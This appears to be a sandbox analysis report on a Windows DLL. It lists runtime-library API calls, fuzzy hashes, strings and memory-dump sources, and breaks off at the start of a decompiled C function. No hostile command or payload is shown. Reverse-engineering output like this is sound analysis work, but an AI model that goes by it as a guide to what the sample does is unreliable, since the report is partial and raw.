    • Instruction ID: 16db910f52149eadc1801a1ea706ac2b01935ffaaeaf18ded109503b97d09394
    • Opcode Fuzzy Hash: d917ed618925ab323780e785bb5292540701fc50299451549717a17e1d811044
    • Instruction Fuzzy Hash: 26118431549B04A6D724ABB1CC05FDF779D5FC0704F8A8826E39EB7860D734BE044652
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6D550B0A
    • __fassign.LIBCMT ref: 6D550CE9
    • __fassign.LIBCMT ref: 6D550D06
    • WriteFile.KERNEL32(?,6D54A1AC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550D4E
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D550D8E
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D550E3A
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 104a07d221855a7471fb0e4b82bc0c078631e9990f0a88d939f08d9e7a22752c
    • Instruction ID: 54c17366915b58e660ff94afe6c41bdded4c44db8c9dff32a138fca38f688fa4
    • Opcode Fuzzy Hash: 104a07d221855a7471fb0e4b82bc0c078631e9990f0a88d939f08d9e7a22752c
    • Instruction Fuzzy Hash: 03D1CB70D042599FCF1ACFA9C880AEDBBB5BF49318F24406BE815BB641D730AE52CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D537DD5
    • _free.LIBCMT ref: 6D537DF0
    • _free.LIBCMT ref: 6D537DFB
    • _free.LIBCMT ref: 6D537F08
      • Part of subcall function 6D545D30: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D54375B,00000001,00000364,00000007,000000FF,?,?,?,6D5438E3,6D54385A), ref: 6D545D71
    • _free.LIBCMT ref: 6D537EDD
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D537EFE
    Similarity
    • API ID: _free$Heap$AllocateErrorFreeLast
    • String ID:
    • API String ID: 4150789928-0
    • Opcode ID: 41f5404957b6b5bb0fce2f01edb9279a0868b1a3df203dbb85d9a896354ffbe4
    • Instruction ID: d931446e554923726cd1dd4474b34480857c40b6679f911b4449b9adb53167f7
    • Opcode Fuzzy Hash: 41f5404957b6b5bb0fce2f01edb9279a0868b1a3df203dbb85d9a896354ffbe4
    • Instruction Fuzzy Hash: 93515D76E08222EBDB0D8F7898506BA77A5DF85314F574859EA41DBA40FB319E06C3A0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D535C6C
    • DName::operator+.LIBCMT ref: 6D535C78
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+=.LIBCMT ref: 6D535D38
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D535CF3
      • Part of subcall function 6D5305BD: DName::operator=.LIBVCRUNTIME ref: 6D5305DE
    • DName::DName.LIBVCRUNTIME ref: 6D535D5C
    • DName::operator+.LIBCMT ref: 6D535D68
    Similarity
    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
    • String ID:
    • API String ID: 2795783184-0
    • Opcode ID: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction ID: 1f2e6ae3bfcfd5a6626498bfe94e201aedd3ab2de3c378f47c6da629dcc98f77
    • Opcode Fuzzy Hash: 22668d5699a88a05d573f2b6aa507f801ede4299453663ae4342e487a131d7b4
    • Instruction Fuzzy Hash: 344192B0A043686FDF09CFA8C894BBE7BF5AF46304F525859D2859BA50F7749E40CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D534A8C
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53469F
      • Part of subcall function 6D534634: DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator+.LIBCMT ref: 6D534A47
    • DName::operator+.LIBCMT ref: 6D534A53
    • DName::DName.LIBVCRUNTIME ref: 6D534AA0
    • DName::operator+.LIBCMT ref: 6D534AAF
    • DName::operator+.LIBCMT ref: 6D534ABB
    Similarity
    • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
    • String ID:
    • API String ID: 955152517-0
    • Opcode ID: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction ID: 814d33db8aa8146a644f6b06ec32224fabd496cf99d5e9e4908289157b3e4564
    • Opcode Fuzzy Hash: c064d4699e858c50e14667cc1418b747083d0c70852ab021ad7803743cd2cfda
    • Instruction Fuzzy Hash: 9331B2719043649FCB0CCF98D490AEEBBF9EF99304F02485EE68697A40F7359A04CB54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(00000001,?,6D52E60D,6D52A335,6D52A779,?,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8,0000000C,6D52AAB3), ref: 6D52EB5B
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D52EB69
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D52EB82
    • SetLastError.KERNEL32(00000000,6D52A9B1,?,00000001,?,?,00000001,?,6D571DA8,0000000C,6D52AAB3,?,00000001,?), ref: 6D52EBD4
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 44c2bddc8d512aa9484242b186d3cb60c12eb9932d5ddd9967fd97f0965b1984
    • Instruction ID: 800b50aebc63435a2d98185fd5eb020afc386178abb9eebf843a45a1d35bdb7a
    • Opcode Fuzzy Hash: 44c2bddc8d512aa9484242b186d3cb60c12eb9932d5ddd9967fd97f0965b1984
    • Instruction Fuzzy Hash: E001F53210C3329EAE0D1675EC84F1A2BAAFB573B9733062DE121D5CD0FF2148149389
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: operator+shared_ptr
    • String ID: ,USm
    • API String ID: 864562889-54669491
    • Opcode ID: f8fe2a28acc816c4e56bc0a1e67699eacf95a6e717e9d7d5b4ba943a37fc3af6
    • Instruction ID: e6d48c2bcd28b55d3042e41fafb4d8ad4cbeccda08525800f681af05b2093f61
    • Opcode Fuzzy Hash: f8fe2a28acc816c4e56bc0a1e67699eacf95a6e717e9d7d5b4ba943a37fc3af6
    • Instruction Fuzzy Hash: 2B614D7190422AAECF09CFA8C844AAE7FB5FB4A345F02C969E4549BA11F772D601CF51
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,6D5896FA,00000104), ref: 6D556AFC
    Strings
    Similarity
    • API ID: FileModuleName
    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
    • API String ID: 514040917-4022980321
    • Opcode ID: 35cbaf549ee73478a99abd3c1688a5d1119366c28feb21c1240938d25c091fb8
    • Instruction ID: d874984aaec64a1a45f53d407199336c876f9c18e68d240b4ab5069a4dae1046
    • Opcode Fuzzy Hash: 35cbaf549ee73478a99abd3c1688a5d1119366c28feb21c1240938d25c091fb8
    • Instruction Fuzzy Hash: A5213B3694439636DE1E55218C44FAB7B6C8BE3368B060926FD05E2D11F721CA25C2E2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,6D53654E,00000000,?,00000001,00000000,?,6D536681,00000001,FlsFree,6D56ABAC,FlsFree,00000000), ref: 6D53651D
    Strings
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction ID: 426b599f5b4ce936f257fa4e4158f1f96369b24e0305c01b445ed3bb43ebeb40
    • Opcode Fuzzy Hash: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction Fuzzy Hash: 0D11C632A44332ABDF168B688C44B5D77B4AF02771F534A35F910E7A84F770E90086E1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D529F31: std::exception::exception.LIBCONCRT ref: 6D529F3E
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,00000000,?,6D528974,00000018,6D571A64,00000018), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
      • Part of subcall function 6D529F6B: std::exception::exception.LIBCONCRT ref: 6D529F78
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
      • Part of subcall function 6D529FAE: std::exception::exception.LIBCONCRT ref: 6D529FC6
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A1DC
      • Part of subcall function 6D5021E7: std::exception::exception.LIBCONCRT ref: 6D5021F4
    Strings
    Similarity
    • API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 2470674941-3612616537
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6D548D5B), ref: 6D548DB1
    • GetLastError.KERNEL32(?,6D548D5B), ref: 6D548DBB
    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D548DF9
    Strings
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-$ext-ms-
    • API String ID: 3177248105-537541572
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D5373B8,?,?,6D537380,?,00000001,?), ref: 6D5373FA
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D53740D
    • FreeLibrary.KERNEL32(00000000,?,?,6D5373B8,?,?,6D537380,?,00000001,?), ref: 6D537430
    Strings
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6D556EB0
    • GetLastError.KERNEL32(?,?,?), ref: 6D556EBA
    • __dosmaperr.LIBCMT ref: 6D556EC1
    • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6D556EDF
    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6D556F05
    Similarity
    • API ID: FilePointer$ErrorLast__dosmaperr
    • String ID:
    • API String ID: 1114809156-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCPInfo.KERNEL32(?,?,?,?,?,?,6D543C6B,?,?,000000FF,?,?,?,?,?,?), ref: 6D543A29
    • __freea.LIBCMT ref: 6D543BE0
    • __freea.LIBCMT ref: 6D543BEC
    Strings
    Similarity
    • API ID: __freea$Info
    • String ID: k<Tm
    • API String ID: 541289543-231093855
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6D53659C), ref: 6D5365EE
    • GetLastError.KERNEL32(?,6D53659C), ref: 6D5365F8
    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D536620
    Strings
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D5330ED
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D5330FA
    • DName::operator=.LIBVCRUNTIME ref: 6D53317A
    • DName::DName.LIBVCRUNTIME ref: 6D53319A
    Similarity
    • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
    • String ID:
    • API String ID: 2448499823-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D546A98: _free.LIBCMT ref: 6D546AA6
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
    • GetLastError.KERNEL32 ref: 6D545EFF
    • __dosmaperr.LIBCMT ref: 6D545F06
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D545F45
    • __dosmaperr.LIBCMT ref: 6D545F4C
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
    • _free.LIBCMT ref: 6D54361B
    • _free.LIBCMT ref: 6D543651
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,?,6D5438E3,6D54385A,?,?,6D5298A7,000008C8), ref: 6D543715
    • _free.LIBCMT ref: 6D543772
    • _free.LIBCMT ref: 6D5437A8
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6D5438E3,6D54385A,?,?,6D5298A7,000008C8), ref: 6D5437B3
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6D55839E
    • GetLastError.KERNEL32 ref: 6D5583AA
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(FFFFFFFE,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D5583BA
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6D5583CE
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001), ref: 6D558481
    • GetLastError.KERNEL32(?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001,?,6D5513FC,6D54A1AC), ref: 6D55848D
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(FFFFFFFE,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D55849D
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D5584B2
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: _free
    • String ID: -
    • API String ID: 269201875-2547889144
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
    • Opcode ID: 274a007612baa40644cd4d9e739c9b08f7f46fb18afb9c60d9376b0d28e57f02
    • Instruction ID: 5ebc70a673eb80c28e15da06f1dee0750bf19152bc34c7005694386a1b1c4f66
    • Opcode Fuzzy Hash: 274a007612baa40644cd4d9e739c9b08f7f46fb18afb9c60d9376b0d28e57f02
    • Instruction Fuzzy Hash: D991073090425AAEDF1DCE69C450AFEBBB1EF42364F10CA46E875DBA91D3309552CB63
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: C:\Windows\SYSTEM32\loaddll32.exe
    • API String ID: 0-1872383224
    • Opcode ID: 0629795bf0f8e611826e44314d894c35ce618a105aa761d68bf0047e6e029be4
    • Instruction ID: 6a72655316f092c6fee162ecfc7533d483d24761977493ec83f12830eb8a5dd0
    • Opcode Fuzzy Hash: 0629795bf0f8e611826e44314d894c35ce618a105aa761d68bf0047e6e029be4
    • Instruction Fuzzy Hash: DD41A571E04365EBDF1ACB99CC80A9EBBF8EF86310F124466E515D7A40FB709A01CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction ID: 320ebb8cc9b7f9ae688d4b65ec6c1f1d1e2a28de22e9a359cfa2196ae796c12e
    • Opcode Fuzzy Hash: b3654e4926da37d0847fd49d11c7922a5328385dbf5a26a18d57d14d9c1dda13
    • Instruction Fuzzy Hash: 44219172D0461AAFCB298E25CD40E7F3A79EFC4BA4F024515F82557A90C7308D498FE0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetLastError.KERNEL32(?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1), ref: 6D543715
    • _free.LIBCMT ref: 6D543772
    • _free.LIBCMT ref: 6D5437A8
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?), ref: 6D5437B3
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 80cb68f256889b7b40a577ffe03923c7e2993bb9c901a8643982f842fbc1c904
    • Instruction ID: 59156dc9f7c67239fb659d1db27d62b33c44edd4795a70a4d8155a6afb0b6ed0
    • Opcode Fuzzy Hash: 80cb68f256889b7b40a577ffe03923c7e2993bb9c901a8643982f842fbc1c904
    • Instruction Fuzzy Hash: 7311E0B514810266FB0946759C85F2A2569BBC637BF23C638F36886DF0EF214E044553
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __RTC_Initialize.LIBCMT ref: 6D52A7EE
      • Part of subcall function 6D52B40D: RtlInitializeSListHead.NTDLL(6D588DD0), ref: 6D52B412
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D52A858
    • ___scrt_fastfail.LIBCMT ref: 6D52A8A2
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction ID: 9c8ae21e878c3c0282fbb5e741d260dd475e9d98cd92f08348496be605965202
    • Opcode Fuzzy Hash: dc8fd1917554c780ca088498fe6b52c48a349d5dc6d6fe407874b01c88e725ca
    • Instruction Fuzzy Hash: 2721273254C2129EDF1D7BB49804FAC3B729F8226DF124816D680B7DC2DB32484EC6A6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D545D71
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction ID: e9374abefb1ccb153a20242b3a8ebceb6198635ec6c7f30bf1487769857007c1
    • Opcode Fuzzy Hash: 665d7b99aae0023b07a8382b130f00d4dc4c2877de3ca0bd8439ec3edc3baabd
    • Instruction Fuzzy Hash: 1BF0E93164457567EF1E5A76CC0CB7B3798AF82770B12C922E814DBC94DB20EA0586E3
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetACP.KERNEL32(?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54EAE6
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D544733,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EB11
    • _wcschr.LIBVCRUNTIME ref: 6D54EBA5
    • _wcschr.LIBVCRUNTIME ref: 6D54EBB3
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D54EC74
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID:
    • API String ID: 4147378913-0
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D502485(long _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				short* _v32;
    				void _v36;
    				void* _t57;
    				signed int _t58;
    				signed int _t61;
    				signed int _t62;
    				void* _t63;
    				signed int* _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr _t72;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				void* _t78;
    				void _t80;
    				signed int _t81;
    				signed int _t84;
    				signed int _t86;
    				short* _t87;
    				void* _t89;
    				signed int* _t90;
    				long _t91;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				signed int _t102;
